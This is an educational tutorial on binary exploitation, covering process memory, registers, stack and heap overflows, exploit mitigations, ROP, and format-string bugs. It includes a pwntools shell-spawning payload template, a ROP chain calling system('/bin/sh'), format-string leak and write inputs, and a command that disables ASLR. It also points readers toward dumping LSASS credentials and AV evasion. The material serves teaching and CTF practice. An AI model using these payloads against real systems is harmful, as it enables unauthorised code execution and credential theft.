- Memory is divided into segments: stack (local variables, function frames), heap (dynamic allocation), text (code), data (globals)
- The stack grows downward; buffer overflows write past the end of a buffer and overwrite adjacent memory
- The instruction pointer (EIP/RIP) controls what code executes next — overwriting it controls the program
- Modern defences: ASLR (randomises addresses), NX/DEP (non-executable stack and heap), stack canaries, PIE (lets ASLR randomise the binary's own code)
- ROP (Return-Oriented Programming) chains existing code gadgets to bypass NX without injecting new code
How a Program Uses Memory
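When a program runs, the OS gives it a virtual address space divided into segments: text (code), data (globals), heap (dynamic allocation), and stack (local variables, function frames).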
Each running process has its own virtual address space. The OS maps it to physical memory. This is why two processes can use the same address (e.g. 0x7fff...) without conflicting.
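On Linux, a process's segments can be inspected through /proc/<pid>/maps. The sketch below parses text in that format; the sample lines and the names `Mapping` and `parse_maps` are illustrative assumptions, and real addresses differ per process and per run.

```python
from typing import NamedTuple

class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    name: str

def parse_maps(text: str) -> list[Mapping]:
    """Parse text in the /proc/<pid>/maps format into Mapping records."""
    mappings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        start, end = (int(x, 16) for x in fields[0].split("-"))
        name = fields[5] if len(fields) > 5 else "[anonymous]"
        mappings.append(Mapping(start, end, fields[1], name))
    return mappings

# Illustrative sample only, not captured from a real process.
SAMPLE = """\
00400000-00401000 r-xp 00000000 08:01 1234 /tmp/demo
00600000-00601000 rw-p 00000000 08:01 1234 /tmp/demo
01a00000-01a21000 rw-p 00000000 00:00 0 [heap]
7ffc0000-7ffe1000 rw-p 00000000 00:00 0 [stack]
"""

for m in parse_maps(SAMPLE):
    print(f"{m.start:#x}-{m.end:#x} {m.perms} {m.name}")
```

On a Linux machine, passing the contents of /proc/self/maps to `parse_maps` should list the interpreter's own mappings.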
CPU Registers
Registers are tiny, ultra-fast storage locations inside the CPU.
| Register | Name | Purpose |
|---|---|---|
| EIP / RIP | Instruction Pointer | Address of next instruction to execute |
| ESP / RSP | Stack Pointer | Top of the current stack |
| EBP / RBP | Base Pointer | Base of the current stack frame |
| EAX / RAX | Accumulator | General purpose, function return value |
| EBX / RBX | Base | General purpose |
| ECX / RCX | Counter | Loop counter |
| EDX / RDX | Data | General purpose |
| ESI / RSI | Source Index | String/memory operations source |
| EDI / RDI | Destination Index | String/memory operations destination |
The E prefix marks the 32-bit registers (x86) and the R prefix the 64-bit ones (x86-64). EIP/RIP matters most for exploitation: controlling it means controlling what the CPU executes next.
The Stack — Frame by Frame
The stack manages function calls. Every function call pushes a stack frame containing:
- Return address (where to go back after the function ends)
- Saved base pointer
- Local variables and buffers
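#include <string.h>

void vulnerable(char *input) {
    char buffer[64];        // 64 bytes on the stack
    strcpy(buffer, input);  // copies input with no length check
}

When vulnerable() is called, its frame holds buffer at the lowest addresses, with the saved base pointer and then the return address directly above it. strcpy writes upward from the start of buffer, so input longer than 64 bytes runs into both.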
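The frame for vulnerable() can be modelled as a flat byte array to show why an unchecked copy reaches the return address. This is a simplified sketch assuming a 32-bit frame with no padding or canary; the addresses and the helper names are hypothetical, and a real compiler may lay the frame out differently.

```python
import struct

BUF_SIZE = 64

def make_frame(saved_ebp: int, ret_addr: int) -> bytearray:
    """Model a 32-bit frame: 64-byte buffer, saved EBP, return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<II", saved_ebp, ret_addr))

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy like strcpy: start at the buffer and never check its size."""
    frame[0:len(data)] = data

def read_return_address(frame: bytearray) -> int:
    """Read the 4 bytes stored after the buffer and the saved EBP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

frame = make_frame(saved_ebp=0xFFFFD000, ret_addr=0x08048456)

unchecked_copy(frame, b"A" * 64)   # fits exactly: return address intact
print(hex(read_return_address(frame)))

# 64 bytes of buffer + 4 bytes of saved EBP, then a chosen return address
unchecked_copy(frame, b"A" * 68 + struct.pack("<I", 0x41424344))
print(hex(read_return_address(frame)))
```

The second copy is only 8 bytes too long, yet it replaces the address the function will return to.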
Buffer Overflows — The Classic Exploit
A buffer overflow happens when a program writes more data into a buffer than it can hold, overwriting adjacent memory.
// Vulnerable C code
void vuln(void) {
    char name[100];
    gets(name); // gets() has no length limit and was removed in C11; never use it
}
// Safe alternative: reads at most sizeof(name) - 1 characters
fgets(name, sizeof(name), stdin);

Finding the Offset (How Many Bytes to Overwrite EIP)
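A cyclic pattern works because every 4-byte window in it is unique, so the value found in EIP after a crash identifies its own position in the input. Below is a minimal standard-library sketch of that idea using a de Bruijn sequence. It is not pwntools' implementation, and `de_bruijn` and `find_offset` are names chosen for illustration.

```python
import struct

def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Return a de Bruijn sequence: each length-n window appears only once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)

def find_offset(pattern: bytes, register_value: int) -> int:
    """Locate the 4 bytes that ended up in a 32-bit little-endian register."""
    return pattern.find(struct.pack("<I", register_value))

pattern = de_bruijn(b"abcdefghijklmnopqrstuvwxyz", 4)[:200]
print(pattern[:16])
print(find_offset(pattern, 0x61616171))
```

The register value is packed little-endian before searching because x86 stores the lowest byte first, so 0x61616171 corresponds to the bytes "qaaa" in the input.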
# Generate a cyclic pattern (no repeating 4-byte sequences)
python3 -c "import pwn; print(pwn.cyclic(200).decode())"
# Or with Metasploit's tools
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
# After the crash, look up the value found in EIP with the same tool that generated the pattern
python3 -c "import pwn; print(pwn.cyclic_find(0x61616171))" # pwntools
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x61616171

Writing the Exploit
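As a dependency-free sketch of the payload layout this section builds, the same bytes can be assembled with the standard library. The offset and address are the placeholder values used in this section, `build_payload` is an illustrative name, and the single 0xCC byte is a stand-in rather than real shellcode.

```python
import struct

OFFSET = 112            # bytes before the saved return address
RET_ADDR = 0xDEADBEEF   # placeholder address
NOP = b"\x90"

def build_payload(shellcode: bytes, sled_len: int = 16) -> bytes:
    """Lay out: padding | return address | NOP sled | shellcode."""
    ret = struct.pack("<I", RET_ADDR)   # 32-bit little-endian, like pwn.p32
    return b"A" * OFFSET + ret + NOP * sled_len + shellcode

# Stand-in byte (an INT3 breakpoint), not real shellcode.
payload = build_payload(b"\xcc")
print(payload[OFFSET:OFFSET + 4].hex())   # bytes that would land in EIP
print(len(payload))
```

Printing the four bytes at the offset is a quick way to confirm the address was packed in little-endian order before sending anything to a target.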
import pwn

pwn.context.update(arch="i386", os="linux")  # target: 32-bit x86 Linux

# Offset found: 112 bytes to reach EIP
padding = b"A" * 112
# Address to jump to (e.g. a JMP ESP instruction or shellcode address)
# 0xdeadbeef is a placeholder; x86 stores addresses little-endian
eip = pwn.p32(0xdeadbeef)  # 32-bit little-endian pack
# Shellcode: spawns /bin/sh via execve
shellcode = pwn.shellcraft.i386.linux.sh()
shellcode_bytes = pwn.asm(shellcode)
# Layout: padding | return address | NOP sled | shellcode
payload = padding + eip + b"\x90" * 16 + shellcode_bytes

A NOP sled (\x90\x90\x90...) is a run of "do nothing" instructions placed before the shellcode. It gives execution a larger target to land on: a jump to any address in the sled slides down into the shellcode. This helps when the exact shellcode address is uncertain.
Modern Defences
Real-world systems have mitigations. Understanding each one shapes the exploitation approach.
ASLR (Address Space Layout Randomisation)
Randomises the base addresses of the stack, heap, and libraries on every execution.
# Check ASLR status on Linux
cat /proc/sys/kernel/randomize_va_space
# 0 = disabled, 1 = partial (stack, mmap base, vDSO), 2 = full (also the heap)
# Disable for testing (requires root)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Bypasses: information leaks (e.g. format strings), heap spraying, brute force (practical mainly on 32-bit), partial overwrites.
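Why brute force is only realistic with little entropy can be shown with a short calculation. The sketch assumes the target address is re-randomised on every attempt with `entropy_bits` bits of randomness, so each guess succeeds with probability 1/2^bits. The entropy values 8 and 28 are hypothetical figures chosen for contrast, not measurements of any system.

```python
def success_probability(entropy_bits: int, attempts: int) -> float:
    """Chance that at least one of `attempts` independent guesses is right."""
    p_single = 1 / 2 ** entropy_bits
    return 1 - (1 - p_single) ** attempts

for bits in (8, 28):   # hypothetical entropy values for comparison
    expected_attempts = 2 ** bits
    print(bits, expected_attempts, success_probability(bits, 1000))
```

With a handful of bits, a thousand attempts almost certainly succeed; with a few dozen bits the same effort is negligible, which is why a leak is the usual route on 64-bit targets.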
NX / DEP (Non-Executable Memory)
Marks the stack and heap as non-executable. Shellcode injected there causes a segfault instead of running.
# Check if NX is enabled on a binary
checksec --file=./binary

Bypass: Return-Oriented Programming (ROP), which reuses existing executable code instead of injected shellcode.
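The stack's executable permission is recorded in the binary's PT_GNU_STACK program header. The sketch below reads that header directly. It assumes a 64-bit little-endian ELF and is a simplified illustration, not a description of how checksec is implemented. `fake_elf` is a hypothetical helper that builds a header-only image for the demo.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header type describing stack permissions
PF_X = 0x1                  # "executable" permission bit

def nx_enabled(elf: bytes) -> bool:
    """Return True if the ELF asks for a non-executable stack."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF")
    e_phoff, = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return not (p_flags & PF_X)
    # No PT_GNU_STACK header: treated conservatively here as "not NX";
    # actual behaviour depends on the kernel and architecture.
    return False

def fake_elf(stack_flags: int) -> bytes:
    """Build a header-only ELF64 image with one PT_GNU_STACK entry (demo only)."""
    header = bytearray(64)
    header[:6] = b"\x7fELF\x02\x01"
    struct.pack_into("<Q", header, 0x20, 64)       # e_phoff: right after header
    struct.pack_into("<HH", header, 0x36, 56, 1)   # e_phentsize, e_phnum
    phdr = bytearray(56)
    struct.pack_into("<II", phdr, 0, PT_GNU_STACK, stack_flags)
    return bytes(header + phdr)

print(nx_enabled(fake_elf(0x6)))   # RW stack
print(nx_enabled(fake_elf(0x7)))   # RWE stack
```

For a real file, the same function can be given the bytes read from the binary in "rb" mode.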
Stack Canaries
A random value placed between local variables and the return address. If a buffer overflow overwrites the canary, the program detects it and crashes before the return.
# checksec shows all protections at once
checksec --file=./binary
# RELRO   STACK CANARY   NX           PIE
# Full    Canary found   NX enabled   Enabled

Bypass: Information leak to read the canary value before overwriting it.
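The canary check can be modelled in a few lines. This toy frame is laid out as buffer, canary, return address; sizes and names are illustrative assumptions. The leading zero byte mirrors the terminator-style canaries glibc uses, and the "RETN" bytes are a placeholder for a return address.

```python
import secrets

BUF_SIZE = 16

def call_with_canary(data: bytes) -> str:
    """Model a frame laid out as buffer | canary | return address."""
    canary = b"\x00" + secrets.token_bytes(3)   # random value chosen at startup
    frame = bytearray(BUF_SIZE) + canary + b"RETN"
    frame[0:len(data)] = data                   # unchecked copy into the buffer
    if bytes(frame[BUF_SIZE:BUF_SIZE + 4]) != canary:
        return "stack smashing detected"        # abort before the return is used
    return "returned normally"

print(call_with_canary(b"A" * 16))   # fills the buffer exactly
print(call_with_canary(b"A" * 24))   # runs over the canary and return address
```

An overflow has to cross the canary to reach the return address, so the attacker needs to know its value to write it back unchanged.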
PIE (Position Independent Executable)
Builds the binary as position-independent code, so ASLR can also randomise the base address of the executable itself.
Impact: Without PIE, the code (text) segment is loaded at a fixed address, so the addresses of ROP gadgets in the binary are known in advance. With PIE and ASLR together, all addresses are randomised.
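Under PIE, offsets inside the binary stay fixed even though the base moves, so one leaked address is enough to compute the rest. A minimal sketch of that arithmetic, where every address and offset is hypothetical:

```python
def rebase(leaked_address: int, leaked_symbol_offset: int, target_offset: int) -> int:
    """Turn one leaked runtime address into the runtime address of another offset."""
    base = leaked_address - leaked_symbol_offset
    if base & 0xFFF:
        raise ValueError("computed base is not page-aligned; check the offsets")
    return base + target_offset

# All values below are hypothetical.
LEAK = 0x55D4C0A01149     # runtime address of main, obtained from a leak
MAIN_OFFSET = 0x1149      # offset of main inside the file
GADGET_OFFSET = 0x12A3    # offset of some gadget inside the file

print(hex(rebase(LEAK, MAIN_OFFSET, GADGET_OFFSET)))
```

The page-alignment check is a cheap sanity test: load bases are page-aligned, so a misaligned result usually means the wrong symbol or offset was used.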
ROP — Return-Oriented Programming
ROP bypasses NX by chaining together small existing code sequences called gadgets — each ending with a ret instruction.
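A normal call pushes a return address, runs the function, and ret pops that address to resume the caller. ROP abuses the same mechanism: the attacker fills the stack with gadget addresses, and each gadget's ret pops the next one.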
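The way ret drives a chain can be modelled with a toy interpreter. This is a conceptual sketch, not an exploit: the gadget addresses, the `BINSH` address, and the two-gadget "instruction set" are hypothetical.

```python
def run_chain(stack: list[int], gadgets: dict[int, str]) -> list[str]:
    """Walk a fake stack the way ret does: pop an address, run that gadget."""
    regs = {"rdi": 0}
    trace = []
    while stack:
        address = stack.pop(0)               # ret: pop next address into RIP
        name = gadgets[address]
        if name == "pop rdi; ret":
            regs["rdi"] = stack.pop(0)       # gadget consumes one stack word
            trace.append(f"rdi = {regs['rdi']:#x}")
        elif name == "system":
            trace.append(f"system({regs['rdi']:#x})")
            break
    return trace

# Hypothetical addresses, for illustration only.
GADGETS = {0x401233: "pop rdi; ret", 0x401050: "system"}
BINSH = 0x402010                             # pretend address of "/bin/sh"

chain = [0x401233, BINSH, 0x401050]
print(run_chain(chain, GADGETS))
```

The chain is data, not code: three words on the stack are enough to load an argument register and transfer control to an existing function.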
# Find ROP gadgets in a binary
ROPgadget --binary ./binary
ropper -f ./binary
# pwntools automates chain building
python3 -c "
from pwn import *
elf = ELF('./binary')
rop = ROP(elf)
rop.call('system', [next(elf.search(b'/bin/sh'))])
print(rop.dump())
"

The Heap — Dynamic Memory
The heap stores data allocated at runtime (malloc() in C, new in C++).
Heap vulnerabilities:
| Vulnerability | Cause | Impact |
|---|---|---|
| Heap overflow | Write past end of allocated chunk | Overwrite adjacent metadata |
| Use-After-Free (UAF) | Use pointer after free() | Dangling pointer that can lead to arbitrary read/write |
| Double Free | free() same pointer twice | Heap corruption |
| Heap spray (technique) | Fill heap with shellcode + offsets | Makes landing at a predictable address more reliable |
UAF is one of the most common classes of memory corruption bugs in modern browsers (Chrome, Firefox). Browser heaps are complex and frequently targeted, and many Chrome exploits seen in the wild have been UAF bugs.
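Use-after-free is easier to see with a toy allocator that hands a freed slot straight back to the next caller. `ToyHeap` is an illustrative model assuming last-freed, first-reused behaviour; it is not how any particular malloc implementation works internally.

```python
class ToyHeap:
    """A tiny allocator that reuses the most recently freed slot first."""

    def __init__(self) -> None:
        self.slots: list[dict] = []
        self.free_list: list[int] = []

    def malloc(self) -> int:
        if self.free_list:
            return self.free_list.pop()      # recycle a freed slot
        self.slots.append({})
        return len(self.slots) - 1

    def free(self, handle: int) -> None:
        self.free_list.append(handle)        # the caller's handle is not cleared

heap = ToyHeap()
session = heap.malloc()
heap.slots[session]["is_admin"] = False
heap.free(session)                           # 'session' is now dangling

attacker = heap.malloc()                     # gets the same slot back
heap.slots[attacker]["is_admin"] = True      # attacker-controlled contents

print(session == attacker)
print(heap.slots[session]["is_admin"])       # stale handle sees attacker data
```

The same model shows why a double free corrupts state: freeing one handle twice puts the slot on the free list twice, so two later allocations receive the same memory.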
Format String Vulnerabilities
If user input is passed directly as the format string, as in printf(user_input), specifiers such as %x, %s, and %n make printf read values from the stack or, with %n, write to an address taken from it.
// Vulnerable
printf(user_input); // user controls the format string
// Safe
printf("%s", user_input); // format string is fixed

# Leak stack values:
./vuln <<< "%x.%x.%x.%x.%x"
# Write to memory (very powerful):
./vuln <<< "%n" # writes the number of bytes printed so far to the address in the next argument slot

What format strings give you:
- Arbitrary read — leak ASLR addresses, canary values
- Arbitrary write — overwrite function pointers, GOT entries
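The read side of this can be imitated with a toy formatter that treats each %x as "consume the next stack word", which is what printf does when no matching arguments were passed. The stack contents are hypothetical, and `toy_printf` handles only %x.

```python
import re

def toy_printf(fmt: str, stack: list[int]) -> str:
    """Expand each %x by consuming successive words from a fake stack."""
    words = iter(stack)
    return re.sub(r"%x", lambda _: format(next(words, 0), "x"), fmt)

# Hypothetical stack contents: a saved pointer, a canary, a return address.
fake_stack = [0xFFFFD0C0, 0x8A3F1200, 0x08048456, 0x0, 0x1]

print(toy_printf("%x.%x.%x", fake_stack))
```

Each extra %x in the input walks one word further up the stack, which is how a canary or a return address ends up in the program's output.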
Tools for Binary Exploitation
| Tool | Purpose |
|---|---|
| gdb + pwndbg/peda | Dynamic analysis, crash examination |
| pwntools (Python) | Exploit scripting library |
| checksec | Enumerate binary protections |
| ROPgadget / ropper | Find ROP gadgets |
| ghidra / IDA Pro | Static disassembly and decompilation |
| ltrace / strace | Trace library/system calls |
| objdump | Disassemble binary |
| strings | Extract printable strings (find hardcoded creds) |
# Basic GDB workflow
gdb ./binary
(gdb) run < input.txt # Run with input
(gdb) info registers # Print all registers after crash
(gdb) x/32x $esp # Examine 32 hex words from stack pointer
(gdb) disassemble main # Disassemble main function

Operational Notes
- 32-bit vs 64-bit matters a lot: on 64-bit Linux the first six integer arguments are passed in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack, so ROP chains have to load registers rather than just place values on the stack.
- ASLR defeats most binary exploits on modern systems without a leak. Your first goal in most heap/stack exploits is getting a memory address, not code execution directly.
- CTF exploits vs real-world exploits: CTF binaries often have some protections disabled to make challenges tractable, while real programs usually ship with most of them enabled. The skills transfer, but the complexity scales up significantly.
- `strings ./binary | grep -i pass`: always run strings on an unknown binary first. Hardcoded credentials are found this way more often than you'd expect.
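The strings triage step can be approximated in a few lines when the tool itself is not available. This is a rough sketch of the idea (runs of printable ASCII of a minimum length), not a reimplementation of the strings utility, and the sample blob is made up for the demo.

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

# Hypothetical blob standing in for the contents of a binary.
blob = b"\x7fELF\x02\x01\x00\x00admin_password=hunter2\x00\x01\x02ok\x00/bin/sh\x00"

hits = [s for s in extract_strings(blob) if "pass" in s.lower()]
print(extract_strings(blob))
print(hits)
```

For a real file, the same function can be given the bytes read from the binary, with the filter term adjusted to whatever is being hunted for.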
What to Read Next
- Exploitation — apply this foundation to real CVEs, Metasploit, and manual exploit development
- Post-Exploitation — once inside, memory skills help dump credentials from LSASS
- Evasion & AV Bypass — shellcode obfuscation relies on understanding how memory and execution work